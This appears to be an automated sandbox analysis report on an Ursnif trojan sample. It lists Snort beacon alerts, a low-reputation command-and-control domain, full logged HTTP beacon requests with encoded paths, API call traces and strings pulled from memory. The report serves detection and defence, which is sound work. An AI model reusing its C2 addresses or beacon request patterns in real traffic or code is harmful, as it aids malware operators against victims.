Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04639F9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0462F8CE

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_0462FD33 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

3_2_0462FD33

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49782 -> 40.97.116.82:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49866 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49882 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49884 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49886 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49888 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49896 -> 45.90.58.179:80

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source:	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz

Source: Joe Sandbox View	IP Address: 52.97.144.178 52.97.144.178
Source: Joe Sandbox View	IP Address: 40.101.81.146 40.101.81.146

Source: Joe Sandbox View

ASN Name: GREENFLOID-ASUA GREENFLOID-ASUA

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /jdraw/4TWYD_2BKnV08xS5_/2F7HOCZrKwN0/4Zpub6ftuB_/2BizrVf_2BAEup/ooDnvqHPfcHYlzHuUeiq_/2BOcpQ3mscYC5ZQS/bCsofKuPGmQwD_2/FVd5R5hEPIiJUNt23U/AcieANSDJ/mLDV7I5LTSGIHgpcJd6S/EuKELXcxsS6HB64bzGC/Qm4swXvWNsxPSQQ_2B6aDm/9BguH_2BrAi/sCi.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: PHPSESSID=oj5lijodqe611lf3pm8jatk5p5; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/nCtz8Lq6aEDL_2BsA7Qn5/Dev5sCookYywtQ9z/nG7suU6eaLynJDf/6nVlQrTedw14SsFLaP/dONDpCANh/eFyKJLQSVfXFPwoYfc_2/Fxcw2VZX7ufzKzV_2B_/2BcmZDAxHE9PqdJN_2FqrA/xpLUjN90HazXC/umw6oByt/_2BMDLnSdL9xoOnOquolygh/AYKttn5cY4/7XRs5_2FBpnYMuiL1/LLL0Aa3xG7M/waJBx6.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/P4wQs6220jnbtlIYjS/M_2BrTOFK/S5ZrWVsOjLJpN_2FedVX/CBkwP5kzII66fKYw3z_/2FjIng5PhqmFkUxpfJCyXT/oTx8Wl7oZau6V/473q3ztH/dQPwZCOMD_2BpYilPiiz4nZ/uZIwiZ0fko/kjMIGTqZ5JCk_2FS0/Gy_2FwKsvZXz/cjy_2FkTVRx/BwPtRyW55ulGu6/1jq9nBFzw/u.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000002F.00000003.894371427.00000251C410A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000002F.00000002.937086624.00000251ABC51000.00000004.00000001.sdmp, powershell.exe, 00000034.00000002.933509067.0000015F80001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5j
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.917390433.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FG
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/potec.core.min.js
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://wa.ui-portal.de/opt-out-transfer/mailcom/
Source: rundll32.exe, 00000007.00000003.846631247.00000000034EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
